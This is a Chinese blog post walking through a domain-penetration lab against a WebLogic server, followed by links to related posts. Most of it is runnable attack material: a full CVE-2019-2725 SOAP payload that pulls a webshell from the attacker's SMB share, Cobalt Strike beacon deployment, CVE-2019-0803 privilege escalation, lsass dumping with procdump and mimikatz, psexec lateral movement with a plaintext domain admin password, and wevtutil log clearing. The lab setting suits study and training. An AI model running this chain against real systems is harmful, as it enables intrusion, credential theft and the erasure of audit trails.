记一次简单的域渗透-从Web站点上线不出网内网主机-痕迹清理

已于 2023-09-18 09:49:51 修改
阅读量504 收藏 5
点赞数 1
分类专栏: 域渗透 文章标签: 网络安全 web安全 python java 威胁分析 android 系统安全
于 2023-09-17 10:37:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45965246/article/details/132939135
版权

一实验环境准备

靶机地址:链接:https://pan.baidu.com/s/1P8WJYuO8VtY6YfqbllD10w?pwd=dsg7
提取码:dsg7

配置信息

DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域

web IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogin 10.3.6 MSSQL 2008

PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用:

攻击机 IP:192.168.111.1 OS:Windows 10(64) IP:192.168.111.5 OS:Kali

二通过weblogic入侵web服务器

2.1 信息收集

全端口扫描

┌──(root💀kaliStudying)-[~]
└─# nmap -p- -T5 192.168.111.80 -o web

image-20220326110021880

已知7001端口是weblogic服务,web服务器上安装有360安全卫士,不利于直接打入,尝试寻找weblogic的漏洞

使用WeblogicScan工具扫描目标机器,将工具上传到kali上

解压缩,并进入目录

┌──(root💀kaliStudying)-[~]
└─# unzip WeblogicScan-master.zip
┌──(root💀kaliStudying)-[~]
└─# cd WeblogicScan-master

开始扫描

┌──(root💀kaliStudying)-[~/WeblogicScan-master]
└─# python3 WeblogicScan.py 192.168.111.80 7001

image-20220326111517352

扫描结束,目标存在Java反序列化漏洞:CVE-2019-2725

image-20220326111718130

2.2利用CVE-2019-2725获取目标机shell

上传并安装冰蝎,解压缩重命名Behinder,切换目录

┌──(root??kaliStudying)-[~]
└─# cd Behinder

暂时先不要启动冰蝎,我们可以利用刚才扫描出来的漏洞CVE-2019-2725构造恶意的POC代码将我们的木马程序上传到目标机器上面

启动smbserver共享文件服务,将/root/Behinder/server目录共享出去,共享的名称为share

┌──(root💀kaliStudying)-[~/Behinder]
└─# impacket-smbserver share /root/Behinder/server &

测试web服务器的smb服务是否正常,在web虚拟机上访问:\192.168.111.5\share 查看共享的内容

image-20220326163807935

以下是基于CVE-2019-2725漏洞的POC攻击代码:

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: text/xml
Content-Length: 839

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>copy \\192.168.111.5\share\shell.jspx.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp </string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

在kali中打开bp,将上面的攻击POC代码粘贴到Repeater中进行发包,发送之后会有一个弹窗,设置目标主机端口 image-20220326164845826
再次点击发送,即可将webshell成功上传到目标机上

image-20220326165031434

启动冰蝎,连接上传的1.jsp木马程序

┌──(root💀kaliStudying)-[~]
└─# java -jar /root/Behinder/Behinder_v3.0_Beta6_linux.jar

image-20220326165311881

右键->新增,连接shell

URL:http://192.168.111.80:7001/_async/1.jsp密码:rebeyond

image-20220326165515570

双击连接1.jsp(如果连接shell获取不到信息可以重新打开)

image-20220326170453460

查看用户信息

C:\Oracle\Middleware\user_projects\domains\base_domain >whoami

image-20220326170630737

查看系统信息,看一下系统安装了哪些补丁。

C:\Oracle\Middleware\user_projects\domains\base_domain > systeminfo

image-20220326170834491

三提权反弹shell给cs

3.1 Cobalt Strike部署

上传Cobalt Strike到kali上,解压缩并进入目录

添加执行权限

┌──(root??kaliStudying)-[~/CobaltStrike4.3]
└─# chmod +x cobaltstrike teamserver start.sh

启动服务端(命令+ip+密码)

┌──(root💀kaliStudying)-[~/CobaltStrike4.3]
└─# ./teamserver 192.168.111.5 123456 &

启动客户端

┌──(root💀kaliStudying)-[~/CobaltStrike4.3]
└─# ./start.sh &

用户名随意填写,cs支持多人协同工作,所有人的密码都是123456

image-20220326172620507
image-20220326172717194

3.2创建监听器

创建监听

image-20220326172949761
image-20220326173023436

image-20220326173117471

生成exe程序

image-20220326173100868

这里不建议使用x64,因为使用32位的程序可以运行在64位的系统上,如果你明确知道对方是x64系统也可以生成64位

image-20220326173258677

将文件保存到冰蝎下的server目录

image-20220326173352516

3.3普通用户提权-反弹SYSTEM权限的shell给cs服务

1、获取普通用户权限

修改刚才使用的POC攻击代码,上传我们生成.exe后门程序,也可以使用冰蝎进行上传(后面使用)

重命名为web.exe

┌──(root💀kaliStudying)-[~/Behinder/server]
└─# mv artifact.exe web.exe

image-20220326174249967

使用冰蝎,切换到我们上传文件的目录,上传web.exe后门程序

image-20220326175025623

image-20220326174906832

使用cmd命令行终端并切换到上传文件的目录

image-20220326175612374

C:\Oracle\Middleware\user_projects\domains\base_domain>cd 
servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/

运行web.exe

image-20220326175701016

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\
_WL_internal\bea_wls9_async_response\8tpkys\war>web.exe

cs成功上线web服务器

image-20220326175949294

打开会话窗口

image-20220326180141169

设置命令执行周期,默认是60秒,修改为2秒

beacon>sleep 2

image-20220326180059331

2、开始提权

上传相关利用工具到kali

image-20220326200011709

使用cs上传相关利用工具到目标机

beacon>upload /root/CVE-2019-0803.exe
beacon>upload /root/mimidrv.sys
beacon>upload /root/mimikatz.exe
beacon>upload /root/mimilib.dll
beacon>upload /root/procdump64.exe

image-20220326200749646

已知系统没有安装相关漏洞的补丁。所以我们直接利用工具提权即可。

返回SYSTEM权限的shell

beacon> shell CVE-2019-0803.exe cmd "start web.exe"

image-20220327085545381

等程序执行完成就会返回SYSTEM权限的shell,如果没有返回,则尝试重新执行命令,有一定的成功率,下图则会提权成功

image-20220327085653512

四明文读取系统内存中用户凭证

4.1使用procdump64+mimikatz获取用户明文密码

进入SYSTEM权限的会话,并且设置sleep 2

image-20220327085936843

beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp

image-20220327090305243

利用mimikatz.exe从lsass.dmp里获取Windows处于active状态账号的明文密码

beacon> shell mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >pass.txt

使用download命令下载,下载后会保存到程序目录的downloads目录

beacon> download pass.txt

image-20220327090528650

读取下载之后的密码,文件名是随机字符串

┌──(root??kaliStudying)-[~/CobaltStrike4.3]
└─# cd downloads
┌──(root💀kaliStudying)-[~/CobaltStrike4.3/downloads]
└─# ls
4e683782f

查看文件内容,获取域控管理员的明文密码

┌──(root💀kaliStudying)-[~/CobaltStrike4.3/downloads]
└─# cat 4e683782f

image-20220327093042581

4.2域信息收集-找出域控制服务器主机名和IP

查看网络信息找到域控

beacon> shell ipconfig /all

image-20220327093324572

一般情况下,作为DNS服务器的就是域控服务器

查看域控制器

beacon> shell net group "domain controllers" /domain

image-20220327094652315

主机名:DC,完整的主机是:DC.de1ay.com 再确认主机名为DC的IP地址

beacon> shell ping dc

image-20220327094842724

查看域管理员:

beacon> shell net group "domain admins" /domain

image-20220327095014714

五通过有效凭证登录DC反弹dcshell给cs

5.1生成管理账号密码用户凭证-连接域控服务器-反弹域控shell

回到控制目标主机的初始用户账户下

beacon> rev2self

查看当前的权限:

beacon> getuid

image-20220327095451103

通过前面获取到的DC的DE1AY\adminstrator账户信息,生成新的凭证

beacon> make_token DE1AY\administrator 1qaz@WSX

image-20220327095657441

创建新的监听

image-20220327095729999

image-20220327095803461

DC上线,jump会使用前面的凭证和smb监听器,完成登录DC的过程

beacon> jump psexec DC smb

image-20220327100034300

image-20220327100100684

成功拿到域控,我们可以为所欲为了!

六拿到PC主机shell

扫描内网的其他存活主机

image-20220327100821811

选择10.10.10.0网络,把ports清空,使用arp协议对该网段进行扫描,探测存活主机

image-20220327100937811

发现一台新的主机存活

image-20220327101053615

选择拥有 system 权限的会话,这个会话之前已经完成以下两步骤:

域控制器用户 DE1AY\administrator 的凭证

beacon> make_token DE1AY\administrator 1qaz@WSX

还有 smb 监听器

DC 上线,jump 会使用前面的凭证和 smb 监听器,完成登录 DC 的过程

beacon> jump psexec DC smb

选择横向移动到另一台机器

beacon> jump psexec 10.10.10.201 smb

image-20220327104146824

痕迹清除-日志清除

beacon> wevtutil el             列出系统中所有日志名称
beacon> wevtutil cl system      清理系统日志
beacon> wevtutil cl application 清理应用程序日志
beacon> wevtutil cl security    清理安全日志

分别在刚才访问过的机子上进行日志清除

image-20220327111210874
查看日志是否清除

image-20220327111314152
image-20220327111328367
image-20220327111420739

呆宝宝不呆哦~
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
探索WebLogic扫描工具:KingKaki的Weblogic-scan
gitblog_00014的博客
03-27 806
探索WebLogic扫描工具:KingKaki的Weblogic-scan 项目地址:https://gitcode.com/kingkaki/weblogic-scan 在网络安全日益重要的今天,对应用程序的漏洞检测成为了一项必不可少的任务。WebLogic,作为Oracle公司的一款企业级应用服务器,其安全性直接影响到大量业务系统的稳定运行。为此,我们想要向您推荐一个名为Weblogic-s...
weblogicscan
09-23
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束” 支持最近的CVE-2023-21839漏洞T3&&IIOP,JNDI和JRMP类型漏洞需要填写自定义的dnslog地址,防止waf拦截常用的dnslog名 支持内存马注入目前支持哥斯拉4 Servlet Filter、冰蝎3.11 Servlet、蚁剑Custom Filter 支持jrmp jndi类型漏洞 支持Weblogic 3DES和AES解密 目前支持批量探测T3、IIOP协议开放状态,内网IP地址(IIOP实现),常见的接口
weblogic0638_GitHub - ffpepwowa/weblogicScanner: weblogic 漏洞扫描工具。目前包含 CVE-2014-4210、CVE-2016-0638、CV...
weixin_39630999的博客
12-20 257
weblogicScaner截至 2020 年 3 月 7 日,weblogic 漏洞扫描工具。若存在未录且已公开 POC 的漏洞,欢迎提交 issue。原作者已经收集得比较完整了,在这里做了部分的 bug 修复,部分脚本 POC 未生效,配置错误等问题。之前查了一下发现部分 POC 无法使用。在这个项目里面对脚本做了一些修改,提高准确率。注意:部分漏洞由于稳定性原因需要多次测试才可验证目前可检...
内网渗透实战——红日ATT&CK系列靶场(二)学习笔
ierciyuan的博客
09-14 3026
内网渗透实战攻打红日靶场02,包括环境配置、信息收集、漏洞利用、内网渗透等操作。
内网渗透不出上线CS)
最新发布
qq_64302290的博客
05-25 1141
cs是一款强大的控制windows木马的工具。是目前渗透中常使用的一个工具。
WeblogicScanner工具批量测试Weblogic漏洞
wcl20010的博客
05-18 1313
项目地址: https://githb.com/0xn0ne/weblogicScanner 进入工具所在目录:安装依赖库 usage: ws.py [-h] -t TARGETS [TARGETS ...] -v VULNERABILITY [VULNERABILITY ...] [-o OUTPUT] optional arguments: -h, --help 帮助信息 -t TARGETS [TARGETS ...], --ta.
impacket使用指南
YUKIDDDD的博客
08-02 1903
impacket使用指南1.介绍2.impacket包含的协议3.impacket包含的工具3.1 远程执行3.2 Kerberos3.3 Windows密码3.4 服务器工具/ MiTM攻击3.5 WMI3.6 已知的漏洞3.7 SMB / MSRPC3.8 MSSQL / TDS3.9 文件格式3.10 其他 1.介绍 Impacket是用于处理络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开
WeblogicScan.zip
01-28
基于python,可扫描Weblogic常见漏洞
内网渗透-反弹shell.pdf
10-28
这是一份学习笔,各个文章的摘抄整合。比较全面的反弹shell方法
内网中的信息收集之一内网结构的探测.pdf
01-25
内网中的信息收集之一内网结构的探测 在内网中,信息收集是非常重要的一步,对于入侵者来说,了解内网的结构是非常关键的。本文将详细介绍内网中的信息收集之一内网结构的探测。 一、内网信息收集的重要性...
使用反向ssh从外访问内网主机的方法详解
09-15
标题中提到的“使用反向SSH从外访问内网主机的方法详解”是一种解决内网主机对外不可见问题的技术手段,适用于没有权限设置端口映射或不具备内网主机IP的情况。这种方法主要通过建立反向SSH隧道,使得外主机...
weblogic密码破解+反序列化漏洞入侵
11-25
weblogic密码破解+反序列化漏洞入侵 工具。 自己搜罗的。由于 文件大 。我jar 包单独上传了,仔细看我空间。物超所值啦。
weblogicScan+cve-2017-10271.rar
06-27
WeblogicScan用来监测weblogic漏洞,支持xmldecode类型和java反序列化类型 WeblogicXmlDecode反序列化利用工具,支持cve-2017-10271
CVE-2019-0803.rar
01-05
windows 7 实测本地提权通过 2008实测部分通过 之后的因为环境原因未有实测 使用方式未 exe + cmd+命令 !进步更大!!!!!
SCZF-ZD-004 内网络及用户管理制度.pdf
04-11
SCZF-ZD-004 内网络及用户管理制度.pdfSCZF-ZD-004 内网络及用户管理制度.pdfSCZF-ZD-004 内网络及用户管理制度.pdfSCZF-ZD-004 内网络及用户管理制度.pdfSCZF-ZD-004 内网络及用户管理制度.pdfSCZF-ZD-...
一次国外某内网的实战过程.pdf
11-25
WEB安全内网渗透
[渗透测试]Vulnstack 红队(二)
cosmoslin的博客
02-10 2235
环境初始化 DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD WEB IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogic 10.3.6 MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用: 攻击机 IP:192.168.111.5 OS:Kali weblogic漏洞利用 nm
探索WeblogicScan:自动化WebLogic服务器安全扫描工具
gitblog_00075的博客
04-25 428
探索WeblogicScan:自动化WebLogic服务器安全扫描工具 项目地址:https://gitcode.com/rabbitmask/WeblogicScan 项目简介 WeblogicScan 是一个开源项目,专门为检测Oracle WebLogic服务器的安全漏洞而设计。由开发者rabbitmask创建并维护,它旨在帮助系统管理员和安全专家快速、有效地识别WebLogic环境中的潜在...
查杀webshell
weixin_33953249的博客
12-01 211
站被注入,由于每个web前端上包含的项目太多,一个htdocs目录下就20几个,查起来也比较头疼。之前也遇到过,但是那次是被上传到图片服务器,那个服务器根本就没有PHP环境,没有造成什么影响。而这次不同,有几个项目不是自己开发的,采用开源的UC-home。 摘自:http://blackbap.org/bbs/viewthread.php?tid=1058 ...
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的名字段来传输数据。 在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内网主机内网主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境中可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值